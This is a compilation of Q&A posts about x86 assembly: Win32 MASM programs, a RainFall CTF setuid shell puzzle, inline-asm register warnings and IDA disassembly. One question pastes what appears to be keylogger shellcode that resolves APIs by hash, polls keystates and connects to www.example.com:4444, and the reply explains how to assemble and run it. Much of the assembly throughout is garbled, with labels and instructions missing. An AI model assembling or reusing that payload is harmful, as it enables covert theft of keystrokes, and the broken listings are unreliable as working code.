Unable to include resource file in program - winapi

I was trying ICZELION's tutorials and this is my asm program:
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\masm32.lib
includelib \masm32\lib\user32.lib
ClassName BYTE "Name of Class",0
MenuName BYTE "Name of Menu",0
TestPrompt BYTE "Test",0
GoodByePrompt BYTE "Good Bye!",0
HelloPrompt BYTE "Hello",0
AppName BYTE "Name Of App",0
IDM_TEST equ 1
IDM_EXIT equ 4
main PROC
call GetCommandLine
push eax
push NULL
push NULL
call GetModuleHandle
push eax
call WinMain
push eax
call ExitProcess
main ENDP
WinMain PROC
push ebp
mov ebp, esp
add esp, 0FFFFFFB0h
mov DWORD PTR [ebp-028h], OFFSET WinProc
mov DWORD PTR [ebp-024h], NULL
mov DWORD PTR [ebp-020h], NULL
push DWORD PTR [ebp+08h]
pop DWORD PTR [ebp-0Ch]
push NULL
call LoadIcon
mov DWORD PTR [ebp-018h], eax
mov DWORD PTR [ebp-04h], eax
push NULL
call LoadCursor
mov DWORD PTR [ebp-014h], eax
mov DWORD PTR [ebp-010h], COLOR_WINDOW
mov DWORD PTR [ebp-0Ch], OFFSET MenuName
mov DWORD PTR [ebp-08h], OFFSET ClassName
lea eax, DWORD PTR [ebp-030h]
push eax
call RegisterClassEx
push NULL
push [ebp+08h]
push NULL
push NULL
push 400
push 400
push 200
push 200
push OFFSET AppName
push OFFSET ClassName
push NULL
call CreateWindowEx
mov [ebp-050h], eax
;display and update the window
push [ebp+014h]
push [ebp-050h]
call UpdateWindow
push [ebp-050h]
call ShowWindow
push NULL
push NULL
push [ebp-050h]
push [ebp-04Ch]
call GetMessage
cmp eax, 0FFFFFFFFh
je _ExitMessageLoop
lea eax, DWORD PTR [ebp-04Ch]
push eax
call TranslateMessage
lea eax, DWORD PTR [ebp-04Ch]
push eax
call DispatchMessage
jmp _MessageLoop
mov eax, [ebp-044h]
mov esp,ebp
pop ebp
ret 010h
WinMain ENDP
WinProc PROC
push ebp
mov ebp, esp
cmp DWORD PTR[ebp+0ch], WM_DESTROY
push NULL
call PostQuitMessage
mov eax, [ebp+0Ch]
cmp al, IDM_TEST
je _test
cmp al, IDM_HELLO
je _hello
je _goodbye
cmp al, IDM_EXIT
je _exit
jmp _ExitWmCommand
push MB_OK
push OFFSET AppName
push OFFSET TestPrompt
push NULL
call MessageBox
jmp _ExitWmCommand
push MB_OK
push OFFSET AppName
push OFFSET HelloPrompt
push NULL
call MessageBox
jmp _ExitWmCommand
push MB_OK
push OFFSET AppName
push OFFSET GoodByePrompt
push NULL
call MessageBox
jmp _ExitWmCommand
push [ebp+08h]
call DestroyWindow
push DWORD PTR [ebp+014h]
push DWORD PTR [ebp+010h]
push DWORD PTR [ebp+0Ch]
push DWORD PTR [ebp+08h]
call DefWindowProc
xor eax, eax
pop ebp
ret 010h
WinProc ENDP
END main
Here is my resource file, mainprog.rc:
#define IDM_TEST 1
#define IDM_HELLO 2
#define IDM_GOODBYE 3
#define IDM_EXIT 4
FirstMenu MENU
POPUP "&PopUp"
I'm unable to include the resource file in the program.
What i do is run an ml on the main asm file, then an rc on the resource file and then link them together. The program assembles normally, but when i run the program, it crashes. On debugging, i found that windows could not find the resource data.

The problem is that the MenuName in your .asm is defined as:
MenuName BYTE "Name of Menu",0
But in your resource file it's called 'FirstMenu'.
I suspect that, if you were to change that to:
MenuName BYTE "FirstMenu"
as shown in the example at http://win32assembly.online.fr/tut8.html, the program will work.


Binary create a shell as another user

I have a specific question,
I have a binary that launch a shell with execv but the shell change the user and with gdb i can't seem to find where the user change is happening.
level0#RainFall:~$ whoami
level0#RainFall:~$ ls -la
-rwsr-x---+ 1 level1 users 747441 Mar 6 2016 level0
level0#RainFall:~$ gdb
(gdb) file level0
Reading symbols from /home/user/level0/level0...(no debugging symbols found)...done.
(gdb) run 423
Starting program: /home/user/level0/level0 423
process 3718 is executing new program: /bin/dash
$ whoami
But when I don't use gdb:
level0#RainFall:~$ ./level0 423
$ whoami
Here is the disas of main
0x08048ec0 <+0>: push ebp
0x08048ec1 <+1>: mov ebp,esp
0x08048ec3 <+3>: and esp,0xfffffff0
0x08048ec6 <+6>: sub esp,0x20
0x08048ec9 <+9>: mov eax,DWORD PTR [ebp+0xc]
0x08048ecc <+12>: add eax,0x4
0x08048ecf <+15>: mov eax,DWORD PTR [eax]
0x08048ed1 <+17>: mov DWORD PTR [esp],eax
0x08048ed4 <+20>: call 0x8049710 <atoi>
0x08048ed9 <+25>: cmp eax,0x1a7
// it compare argv[1] with 423 if it is unequal it print No!
0x08048ede <+30>: jne 0x8048f58 <main+152>
0x08048ee0 <+32>: mov DWORD PTR [esp],0x80c5348
0x08048ee7 <+39>: call 0x8050bf0 <strdup>
0x08048eec <+44>: mov DWORD PTR [esp+0x10],eax
0x08048ef0 <+48>: mov DWORD PTR [esp+0x14],0x0
0x08048ef8 <+56>: call 0x8054680 <getegid>
0x08048efd <+61>: mov DWORD PTR [esp+0x1c],eax
0x08048f01 <+65>: call 0x8054670 <geteuid>
0x08048f06 <+70>: mov DWORD PTR [esp+0x18],eax
0x08048f0a <+74>: mov eax,DWORD PTR [esp+0x1c]
0x08048f0e <+78>: mov DWORD PTR [esp+0x8],eax
0x08048f12 <+82>: mov eax,DWORD PTR [esp+0x1c]
0x08048f16 <+86>: mov DWORD PTR [esp+0x4],eax
0x08048f1a <+90>: mov eax,DWORD PTR [esp+0x1c]
0x08048f1e <+94>: mov DWORD PTR [esp],eax
0x08048f21 <+97>: call 0x8054700 <setresgid>
0x08048f26 <+102>: mov eax,DWORD PTR [esp+0x18]
0x08048f2a <+106>: mov DWORD PTR [esp+0x8],eax
0x08048f2e <+110>: mov eax,DWORD PTR [esp+0x18]
0x08048f32 <+114>: mov DWORD PTR [esp+0x4],eax
0x08048f36 <+118>: mov eax,DWORD PTR [esp+0x18]
0x08048f3a <+122>: mov DWORD PTR [esp],eax
0x08048f3d <+125>: call 0x8054690 <setresuid>
0x08048f42 <+130>: lea eax,[esp+0x10]
0x08048f46 <+134>: mov DWORD PTR [esp+0x4],eax
0x08048f4a <+138>: mov DWORD PTR [esp],0x80c5348
//at this point euid and egid are the one of the user that launched gdb`
0x08048f51 <+145>: call 0x8054640 <execv>
// we never go there since execv opens a shell
0x08048f56 <+150>: jmp 0x8048f80 <main+192>
0x08048f58 <+152>: mov eax,ds:0x80ee170
0x08048f5d <+157>: mov edx,eax
0x08048f5f <+159>: mov eax,0x80c5350
0x08048f64 <+164>: mov DWORD PTR [esp+0xc],edx
0x08048f68 <+168>: mov DWORD PTR [esp+0x8],0x5
0x08048f70 <+176>: mov DWORD PTR [esp+0x4],0x1
0x08048f78 <+184>: mov DWORD PTR [esp],eax
0x08048f7b <+187>: call 0x804a230 <fwrite>
0x08048f80 <+192>: mov eax,0x0
0x08048f85 <+197>: leave
0x08048f86 <+198>: ret
End of assembler dump.
I don't understand how the binary changes behaviour if I execute it by gdb or in the shell, maybe its because the binary's proprietary is level1?
If someone has the time to explain to me how it works I'll be really greatful
Thanks a lot
I don't understand how the binary changes behaviour
The binary doesn't -- the kernel creates a new process with different UID when presented a set-uid binary (that's what s in -rwsr-x---+ means).
For obvious security reasons the kernel doesn't do that when the binary is being debugged.

How can I compile / execute the following code on Windows 7 32 Bit?

Can you tell me how I can execute this code on a windows 7 32bit machine?
Do I need to compile it? If yes, how should I do this?
Which ending (.exe) should the file have?
section .bss
section .data
section .text
global _start
call dword loc_88h
mov ebp,esp
xor eax,eax
mov edx,[fs:eax+0x30]
mov edx,[edx+0xc]
mov edx,[edx+0x14]
mov esi,[edx+0x28]
movzx ecx,word [edx+0x26]
xor edi,edi
cmp al,0x61
jl loc_25h
sub al,0x20
ror edi,byte 0xd
add edi,eax
loop loc_1eh
push edx
push edi
mov edx,[edx+0x10]
mov ecx,[edx+0x3c]
mov ecx,[ecx+edx+0x78]
jecxz loc_82h
add ecx,edx
push ecx
mov ebx,[ecx+0x20]
add ebx,edx
mov ecx,[ecx+0x18]
jecxz loc_81h
dec ecx
mov esi,[ebx+ecx*4]
add esi,edx
xor edi,edi
ror edi,byte 0xd
add edi,eax
cmp al,ah
jnz loc_4fh
add edi,[ebp-0x8]
cmp edi,[ebp+0x24]
jnz loc_45h
pop eax
mov ebx,[eax+0x24]
add ebx,edx
mov cx,[ebx+ecx*2]
mov ebx,[eax+0x1c]
add ebx,edx
mov eax,[ebx+ecx*4]
add eax,edx
mov [esp+0x24],eax
pop ebx
pop ebx
pop ecx
pop edx
push ecx
jmp eax
pop edi
pop edi
pop edx
mov edx,[edx]
jmp short loc_15h
pop ebp
push dword 0x3233
push dword 0x5f327377
push esp
push dword 0x726774c
call ebp
mov eax,0x190
sub esp,eax
push esp
push eax
push dword 0x6b8029
call ebp
push byte +0x10
jmp dword loc_1ceh
push dword 0x803428a9
call ebp
lea esi,[eax+0x1c]
xchg esi,esp
pop eax
xchg esp,esi
mov esi,eax
push dword 0x6c6c
push dword 0x642e7472
push dword 0x6376736d
push esp
push dword 0x726774c
call ebp
jmp dword loc_1e3h
push dword 0xd1ecd1f
call ebp
xchg ah,al
ror eax,byte 0x10
inc eax
inc eax
push esi
push eax
mov esi,esp
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
inc eax
push eax
push eax
push dword 0xe0df0fea
call ebp
mov edi,eax
push byte +0x10
push esi
push edi
push dword 0x6174a599
call ebp
test eax,eax
jz loc_122h
dec dword [esi+0x8]
jnz loc_104h
xor eax,eax
push eax
push dword 0x56a2b5f0
call ebp
push dword 0x3233
push dword 0x72657375
push esp
push dword 0x726774c
call ebp
push dword 0x657461
push dword 0x74537965
push dword 0x4b746547
push esp
push eax
push dword 0x7802f749
call ebp
push esi
push edi
push eax
xor ecx,ecx
mov esi,ecx
mov cl,0x8
push esi
loop loc_155h
xor ecx,ecx
xor esi,esi
push byte +0x8
push dword 0xe035f044
call ebp
mov eax,esi
cmp al,0xff
jnc loc_158h
inc esi
push esi
call dword [esp+0x24]
mov edx,esi
xor ecx,ecx
mov cl,0x80
and eax,ecx
xor ecx,ecx
cmp eax,ecx
jnz loc_18fh
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
btr [esp+eax*4],edx
jmp short loc_165h
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bt [esp+eax*4],edx
jc loc_165h
xor edx,edx
mov ecx,edx
mov eax,esi
mov cl,0x20
div ecx
bts [esp+eax*4],edx
push esi
push byte +0x10
push dword [esp+0x30]
push byte +0x0
push byte +0x1
lea ecx,[esp+0x10]
push ecx
push dword [esp+0x3c]
push dword 0xdf5c9d75
call ebp
lea esp,[esp+0x4]
jmp short loc_158h
call dword loc_b2h
db "www.example.com",0
call dword loc_dfh
db "4444",0
This looks like 32-bit NASM assembly code(A simple beginners introduction). You can assemble it (not compile it) with this installer from the NASM website (version 2.12.02 at the time of this answer).
Assembling and linking it on Windows 7 works like this:
If you have the Microsoft C compiler, you have (somewhere) the linker from Microsoft named link.exe. If you don’t, you can download the Windows 7 SDK, which provides the C compiler and linker(link.exe).
nasm -f win32 yourProg.asm
link /entry:_start /subsystem:console yourProg.obj <locationOfYour>\kernel32.lib
But a quick glance over the code makes obvious that there are NO obviously named API calls in it, so the destination platform(Windows, Linux, MacOS, other) is difficult to determine. So this code may assemble, but its execution may(!) be useless(unless run in a debugger) nevertheless.

frame pointer register 'ebx' modified by inline assembly code

Unfortunately, I had to re-image my laptop to install Visual Studio 2012. My project build but with above warning. Previously I had Visual Studio 2010 and I never got the above warning. The code is as follows:
//Initialize pointers on matrices
mov eax, dword ptr [this]
mov ebx, dword ptr [eax+UPkk]
mov dword ptr [UPkk_ptr],ebx
mov ebx, dword ptr [eax+UPk1k]
mov dword ptr [UPk1k_ptr],ebx
mov ebx, dword ptr [eax+DPk1k]
mov dword ptr [DPk1k_ptr],ebx
mov ebx, dword ptr [eax+DPkk]
mov dword ptr [DPkk_ptr],ebx
mov ebx, dword ptr [eax+mat_A]
mov dword ptr [mat_A_ptr],ebx
mov ebx, dword ptr [eax+vec_a]
mov dword ptr [vec_a_ptr],ebx
mov ebx, dword ptr [eax+vec_b]
mov dword ptr [vec_b_ptr],ebx
Do I need to change any settings in the project?
Best Regards
Edit: In the above code when I replace ebx with ecx, the warnings go away and the code works fine. However, there is another piece of code where I have used ebx and ecx and in that case my program crashes. Here is the code:
//Initialize UPk1k[idx_4] pointer
mov eax, dword ptr [UPk1k_ptr]
mov ebx, dword ptr [idx_4]
imul ebx,8
add eax,ebx
mov dword ptr [UPk1k_id4_ptr],eax
//Initialize UPkk[idx_4] pointer
mov eax, dword ptr [UPkk_ptr]
mov ebx, dword ptr [idx_4]
imul ebx,8
add eax,ebx
mov dword ptr [UPkk_id4_ptr],eax
//Initialize UPk1k[idx_4] pointer
mov eax, dword ptr [vec_b_ptr]
mov ebx, dword ptr [idx_1]
imul ebx,8
add eax,ebx
mov dword ptr [vec_b_id1_ptr],eax
mov edi, dword ptr [idx_1] //Load idx_1 in edi
mov esi, 0 //initialize loop counter
jmp start_proc11
start_for11:inc esi //idx_2++
start_proc11:cmp esi, edi //idx_2<idx_1 ?
jge end_for11 //If yes so end of the loop
mov eax, UPk1k_id4_ptr //load UPk1k[idx_4] adress
mov ebx, vec_b_ptr //load vec_b adress
mov ecx, esi
imul ecx,8
add eax, ecx //UPk1k[idx_4+idx_2] in eax
add ebx, ecx //vec_b[idx_2] in eax
fld qword ptr [eax]//push UPk1k[idx_4+idx_2]
fld qword ptr [ebx] //push vec_b[idx_2]
mov edx,dword ptr [Sd_ptr]
fmul qword ptr [edx] //vec_b[idx_2]*Sd
fadd //pop UPk1k[idx_4+idx_2]+vec_b[idx_2]*Sd
mov edx,dword ptr [UPkk_id4_ptr]
fstp qword ptr [edx+esi*8] //pop UPkk[idx_4+idx_2]=UPk1k[idx_4+idx_2]+vec_b[idx_2]*Sd
fld qword ptr [ebx] //push vec_b[idx_2]
mov edx,dword ptr [vec_b_id1_ptr]
fld qword ptr [edx] //push vec_b[idx_2]
fmul qword ptr [eax]
fstp qword ptr [ebx]
jmp start_for11 //end of the loop
Many Thanks
Best Regards
See MSDN about registers and that warning. They explain why the warning is produced: it forces the compiler to preserve value of EBX, which might be counter-productive to performance, the usual reason inline asm is used. Relevant quote:
In addition, by using EBX, ESI or EDI in inline assembly code, you
force the compiler to save and restore those registers in the function
prologue and epilogue.
To disable the warning, I think the syntax is
#pragma warning( disable : 4731 )
However, I'd try to use some other register instead, because the warning is there for a good reason, really, like most warnings.
In fact, Looking at your asm code, simply replace ebx With ecx, that should solve the problem.

Disassembling CGContextReplacePathWithShapePath()?

I am beginner at dis-assembly. Below is the disassembly of CGContextReplacePathWithShapePath from IDA pro. I am trying to figure out the parameters to the routine.
Any help is highly appreciated. Also please post some pointers/hints on how to attack the dis-assembly.
__text:00024D1F ; =============== S U B R O U T I N E =======================================
__text:00024D1F ; Attributes: bp-based frame
__text:00024D1F public _CGContextReplacePathWithShapePath
__text:00024D1F _CGContextReplacePathWithShapePath proc near
__text:00024D1F var_2C = dword ptr -2Ch
__text:00024D1F var_20 = dword ptr -20h
__text:00024D1F var_1C = dword ptr -1Ch
__text:00024D1F arg_0 = dword ptr 8
__text:00024D1F arg_4 = dword ptr 0Ch
__text:00024D1F push ebp
__text:00024D20 mov ebp, esp
__text:00024D22 push edi
__text:00024D23 push esi
__text:00024D24 push ebx
__text:00024D25 sub esp, 3Ch
__text:00024D28 call $+5
__text:00024D2D pop ebx
__text:00024D2E mov esi, [ebp+arg_0]
__text:00024D31 test esi, esi
__text:00024D33 jz short loc_24D3E
__text:00024D35 cmp dword ptr [esi+8], 43545854h
__text:00024D3C jz short loc_24D5F
__text:00024D3E loc_24D3E: ; CODE XREF: _CGContextReplacePathWithShapePath+14j
__text:00024D3E mov [esp+8], esi
__text:00024D42 lea eax, (___func___26084 - 24D2Dh)[ebx] ; "CGContextReplacePathWithShapePath"
__text:00024D48 mov [esp+4], eax
__text:00024D4C lea eax, (aSInvalidContex - 24D2Dh)[ebx] ; "%s: invalid context %p"
__text:00024D52 mov [esp], eax
__text:00024D55 call _CGPostError
__text:00024D5A jmp loc_24DF2
__text:00024D5F ; ---------------------------------------------------------------------------
__text:00024D5F loc_24D5F: ; CODE XREF: _CGContextReplacePathWithShapePath+1Dj
__text:00024D5F mov eax, [esi+58h]
__text:00024D62 test eax, eax
__text:00024D64 jz short loc_24D75
__text:00024D66 mov [esp], eax
__text:00024D69 call _CGPathRelease
__text:00024D6E mov dword ptr [esi+58h], 0
__text:00024D75 loc_24D75: ; CODE XREF: _CGContextReplacePathWithShapePath+45j
__text:00024D75 mov eax, [ebp+arg_4]
__text:00024D78 mov [esp], eax
__text:00024D7B call _CGSRegionPathEnumerator
__text:00024D80 mov edi, eax
__text:00024D82 xor ebx, ebx
__text:00024D84 lea eax, [ebp+var_20]
__text:00024D87 mov [ebp+var_2C], eax
__text:00024D8A jmp short loc_24DCA
__text:00024D8C ; ---------------------------------------------------------------------------
__text:00024D8C loc_24D8C: ; CODE XREF: _CGContextReplacePathWithShapePath+BDj
__text:00024D8C jge short loc_24DB4
__text:00024D8E inc ebx
__text:00024D8F cmp ebx, 1
__text:00024D92 jz short loc_24D9C
__text:00024D94 mov [esp], esi
__text:00024D97 call _CGContextClosePath
__text:00024D9C loc_24D9C: ; CODE XREF: _CGContextReplacePathWithShapePath+73j
__text:00024D9C mov eax, [ebp+var_1C]
__text:00024D9F mov [esp+8], eax
__text:00024DA3 mov eax, [ebp+var_20]
__text:00024DA6 mov [esp+4], eax
__text:00024DAA mov [esp], esi
__text:00024DAD call _CGContextMoveToPoint
__text:00024DB2 jmp short loc_24DCA
__text:00024DB4 ; ---------------------------------------------------------------------------
__text:00024DB4 loc_24DB4: ; CODE XREF: _CGContextReplacePathWithShapePath:loc_24D8Cj
__text:00024DB4 mov eax, [ebp+var_1C]
__text:00024DB7 mov [esp+8], eax
__text:00024DBB mov eax, [ebp+var_20]
__text:00024DBE mov [esp+4], eax
__text:00024DC2 mov [esp], esi
__text:00024DC5 call _CGContextAddLineToPoint
__text:00024DCA loc_24DCA: ; CODE XREF: _CGContextReplacePathWithShapePath+6Bj
__text:00024DCA ; _CGContextReplacePathWithShapePath+93j
__text:00024DCA mov eax, [ebp+var_2C]
__text:00024DCD mov [esp+4], eax
__text:00024DD1 mov [esp], edi
__text:00024DD4 call _CGSNextPoint
__text:00024DD9 cmp eax, 0
__text:00024DDC jnz short loc_24D8C
__text:00024DDE test ebx, ebx
__text:00024DE0 jz short loc_24DEA
__text:00024DE2 mov [esp], esi
__text:00024DE5 call _CGContextClosePath
__text:00024DEA loc_24DEA: ; CODE XREF: _CGContextReplacePathWithShapePath+C1j
__text:00024DEA mov [esp], edi
__text:00024DED call _CGSReleaseRegionEnumerator
__text:00024DF2 loc_24DF2: ; CODE XREF: _CGContextReplacePathWithShapePath+3Bj
__text:00024DF2 add esp, 3Ch
__text:00024DF5 pop ebx
__text:00024DF6 pop esi
__text:00024DF7 pop edi
__text:00024DF8 leave
__text:00024DF9 retn
__text:00024DF9 _CGContextReplacePathWithShapePath endp
The first parameter is a context parameter of some sort.
The function checks to see if it's NULL and in that case jumps to loc_24D3E (where you can see it calls an error function _CGPostError with the format string "%s: invalid context %p"). BTW: Right after it checks a magic value in the context (at context+8) to see if it is valid otherwise it exits through the same error path. The magic value43545854h is CTXT as chars btw.
__text:00024D2E mov esi, [ebp+arg_0]
__text:00024D31 test esi, esi
__text:00024D33 jz short loc_24D3E
As for the second parameter, it looks to be some kind of path as it is used as the sole parameter to CGSRegionPathEnumerator.
__text:00024D75 mov eax, [ebp+arg_4]
__text:00024D78 mov [esp], eax
__text:00024D7B call _CGSRegionPathEnumerator
In C the function would look something like this:
void CGContextReplacePathWithShapePath(Context* context, Path* path) {
if(context == NULL || context->magic != 0x43545854) {
CGPostError("%s: invalid context %p", "CGContextReplacePathWithShapePath", context);
// loc_24D5F
if (context->path != NULL) {
context->path = NULL;
// loc_24D75
RegionPathEnumerator* rpe = CGSRegionPathEnumerator(path);
// ....

RegisterClassEx in Assembly

I'm trying to manually call RegisterClassEx Windows API without using a WNDCLASS structure on .data section, I need to create this structure only using push instruction.
Could someone help me on that please?
Thanks a lot
In fact you can easily do what you want. You just need to be careful to correctly calculate the addresses of each element of the structure. But this is also an easy task... ;)
Please check out the code I did:
push ebp
mov ebp, esp
add esp, -50h
push 7F00h
push 0h
call LoadIconA
mov ebx, eax
push 7F00h
push 0h
call LoadCursorA
;eax = return of LoadCursorA
;ebx = return of LoadIconA
mov dword ptr ss:[ebp-30h], 30h ;WNDCLASSEX.cbSize, dd WNDCLASSEX_size
mov dword ptr ss:[ebp-2Ch], 3h ;WNDCLASSEX.style, dd CS_VREDRAW + CS_HREDRAW
mov dword ptr ss:[ebp-28h], WndProc ;WNDCLASSEX.lpfnWndProc, dd WndProc
mov dword ptr ss:[ebp-24h], 0h ;WNDCLASSEX.cbClsExtra, dd NULL
mov dword ptr ss:[ebp-20h], 0h ;WNDCLASSEX.cbWndExtra, dd NULL
mov dword ptr ss:[ebp-1Ch], 0h ;WNDCLASSEX.hInstance, dd NULL
mov dword ptr ss:[ebp-18h], ebx ;WNDCLASSEX.hIcon, dd return of LoadIconA
mov dword ptr ss:[ebp-14h], eax ;WNDCLASSEX.hIconSm, dd return of LoadCursorA
mov dword ptr ss:[ebp-10h], 06h ;WNDCLASSEX.hbrBackground, dd COLOR_BTNFACE + 1
mov dword ptr ss:[ebp-0Ch], 0h ;WNDCLASSEX.lpszMenuName, dd NULL
mov dword ptr ss:[ebp-08h], offset WndProc ;WNDCLASSEX.lpszClassName, dd offset of ClassName
mov dword ptr ss:[ebp-04h], ebx ;WNDCLASSEX.hCursor, dd return of LoadIconA
lea eax,[ebp-30h]
push eax
call RegisterClassEx
You just need to put this before the call to CreateWindow.
Any doubt just shout.
PS.: Remember that WndProc is the loop procedure of your Assembly program
wndclass WNDCLASS
push offset wndclass
call RegisterClassEx
You should push its offset, not structure itself
For local variable, push its address
lea edx, wndclass
push edx
call RegisterClassEx
Reverse push the structure to the stack, push the effective address to the first item, call RegisterClassEx, pop the structure off the stack.
